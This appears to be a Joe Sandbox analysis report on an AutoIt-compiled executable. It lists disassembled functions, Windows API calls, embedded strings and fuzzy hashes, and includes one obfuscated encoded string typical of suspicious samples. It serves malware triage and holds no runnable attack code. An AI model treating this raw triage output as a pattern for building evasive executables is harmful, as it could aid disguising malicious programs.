                    • GetDesktopWindow.USER32 ref: 00477895
                    • GetWindowRect.USER32(00000000), ref: 0047789C
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
                    • GetClientRect.USER32(00000000,?), ref: 00477A41
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
                    • GlobalLock.KERNEL32(00000000), ref: 00477AC4
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
                    • GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
                    • GlobalFree.KERNEL32(00000000), ref: 00477AEE
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
                    • GlobalFree.KERNEL32(00000000), ref: 00477B26
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    • API String ID: 2211948467-2373415609
                    APIs
                    • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                    • IsWindowVisible.USER32(?), ref: 0048364B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                    • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                    • Opcode Fuzzy Hash: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                    • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 0048A630
                    • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                    • GetSysColor.USER32(0000000F), ref: 0048A66D
                    • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                    • SelectObject.GDI32(?,00000000), ref: 0048A696
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                    • GetSysColor.USER32(00000010), ref: 0048A6C9
                    • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                    • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                    • DeleteObject.GDI32(00000000), ref: 0048A6E6
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                    • FillRect.USER32(?,?,00000000), ref: 0048A763
                    • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                      • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                      • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                      • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                      • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                      • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                      • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                      • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                      • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                      • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                      • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                      • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                      • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                      • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                    • String ID:
                    • API String ID: 3521893082-0
                    • Opcode ID: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                    • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                    • Opcode Fuzzy Hash: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                    • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                    • DeleteObject.GDI32(00000000), ref: 00402CE8
                    • DeleteObject.GDI32(00000000), ref: 00402CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                      • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                    • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                    • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                    • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                    • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 004774DE
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                    • GetClientRect.USER32(00000000,?), ref: 0047763F
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                    • GetStockObject.GDI32(00000011), ref: 004776A2
                    • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                    • DeleteDC.GDI32(00000000), ref: 004776C8
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                    • GetStockObject.GDI32(00000011), ref: 004777A6
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                    • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                    • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                    • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                    • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                    • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: dc875c7f23c7d0eb2fd9c9e49e05cbe8264abdead4ae9aa7525ba1e7fefde2ed
                    • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                    • Opcode Fuzzy Hash: dc875c7f23c7d0eb2fd9c9e49e05cbe8264abdead4ae9aa7525ba1e7fefde2ed
                    • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                    APIs
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: b4290111c942301d7081503a50e49f8e056f13ba1b39f80ed923a9f4a93e99e4
                    • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                    • Opcode Fuzzy Hash: b4290111c942301d7081503a50e49f8e056f13ba1b39f80ed923a9f4a93e99e4
                    • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                    APIs
                    • GetSysColor.USER32(00000012), ref: 0048A903
                    • SetTextColor.GDI32(?,?), ref: 0048A907
                    • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                    • GetSysColor.USER32(0000000F), ref: 0048A928
                    • CreateSolidBrush.GDI32(?), ref: 0048A92D
                    • GetSysColor.USER32(00000011), ref: 0048A945
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                    • SelectObject.GDI32(?,00000000), ref: 0048A964
                    • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                    • SelectObject.GDI32(?,?), ref: 0048A97A
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                    • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                    • GetSysColor.USER32(00000011), ref: 0048AA4B
                    • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                    • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                    • DeleteObject.GDI32(?), ref: 0048AA89
                    • SelectObject.GDI32(?,?), ref: 0048AA8F
                    • DeleteObject.GDI32(?), ref: 0048AA94
                    • SetTextColor.GDI32(?,?), ref: 0048AA9A
                    • SetBkColor.GDI32(?,?), ref: 0048AAA4
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
                    • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                    • Opcode Fuzzy Hash: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
                    • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                    • CharNextW.USER32(0000014E), ref: 00488B01
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                    • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                    • _memset.LIBCMT ref: 00488C44
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                    • _memset.LIBCMT ref: 00488CEC
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                    • DrawMenuBar.USER32(?), ref: 00488EC3
                    • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
                    • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                    • Opcode Fuzzy Hash: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
                    • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                    APIs
                    • GetCursorPos.USER32(?), ref: 004849CA
                    • GetDesktopWindow.USER32 ref: 004849DF
                    • GetWindowRect.USER32(00000000), ref: 004849E6
                    • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                    • DestroyWindow.USER32(?), ref: 00484A74
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                    • IsWindowVisible.USER32(?), ref: 00484B29
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                    • GetWindowRect.USER32(?,?), ref: 00484B70
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                    • CopyRect.USER32(?,?), ref: 00484BC7
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                    • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                    • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                    • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                    APIs
                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                    • _wcscpy.LIBCMT ref: 00464500
                    • _wcscmp.LIBCMT ref: 0046450B
                    • _wcscat.LIBCMT ref: 00464521
                    • _wcsstr.LIBCMT ref: 0046452C
                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                    • _wcscat.LIBCMT ref: 00464591
                    • _wcscat.LIBCMT ref: 00464598
                    • _wcsncpy.LIBCMT ref: 004645C3
                    Similarity
                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 699586101-1459072770
                    • Opcode ID: b88462d4765e7d507f23171d62798ed34a372c9e6a155a9843904c144f7c25e8
                    • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                    • Opcode Fuzzy Hash: b88462d4765e7d507f23171d62798ed34a372c9e6a155a9843904c144f7c25e8
                    • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                    • GetSystemMetrics.USER32(00000007), ref: 004028C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                    • GetSystemMetrics.USER32(00000008), ref: 004028F7
                    • GetSystemMetrics.USER32(00000004), ref: 0040291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                    • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                    • GetStockObject.GDI32(00000011), ref: 004029CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                      • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                      • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                      • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                      • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                    • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                    Strings
                    • AutoIt v3 GUI, xrefs: 00402974
                    • 8dowpbdowpedowpcdowp8dowp1dowpedowpcdowp0dowp4dowp0dowp1dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowp0dowpfdowp5dowp7dowpcdowp0dowp, xrefs: 0043C189
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: 8dowpbdowpedowpcdowp8dowp1dowpedowpcdowp0dowp4dowp0dowp1dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowp0dowpfdowp5dowp7dowpcdowp0dowp$AutoIt v3 GUI
                    • API String ID: 1458621304-3509691525
                    • Opcode ID: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                    • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                    • Opcode Fuzzy Hash: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                    • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                    • __swprintf.LIBCMT ref: 0045A51B
                    • _wcscmp.LIBCMT ref: 0045A52E
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                    • _wcscmp.LIBCMT ref: 0045A5BF
                    • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                    • GetDlgCtrlID.USER32(?), ref: 0045A648
                    • GetWindowRect.USER32(?,?), ref: 0045A67E
                    • GetParent.USER32(?), ref: 0045A69C
                    • ScreenToClient.USER32(00000000), ref: 0045A6A3
                    • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                    • _wcscmp.LIBCMT ref: 0045A731
                    • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                    • _wcscmp.LIBCMT ref: 0045A76B
                      • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                    • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                    • Opcode Fuzzy Hash: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                    • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                    • _wcscmp.LIBCMT ref: 0045AF29
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                    • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                    • _wcscmp.LIBCMT ref: 0045AF8C
                    • _wcsstr.LIBCMT ref: 0045AF9D
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                    • _wcscmp.LIBCMT ref: 0045AFE5
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                    • _wcscmp.LIBCMT ref: 0045B065
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                    • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                    • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                    • Opcode Fuzzy Hash: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                    • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                      • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                      • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                      • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                    • _wcscat.LIBCMT ref: 0048C6EE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                    • DragFinish.SHELL32(?), ref: 0048C75E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
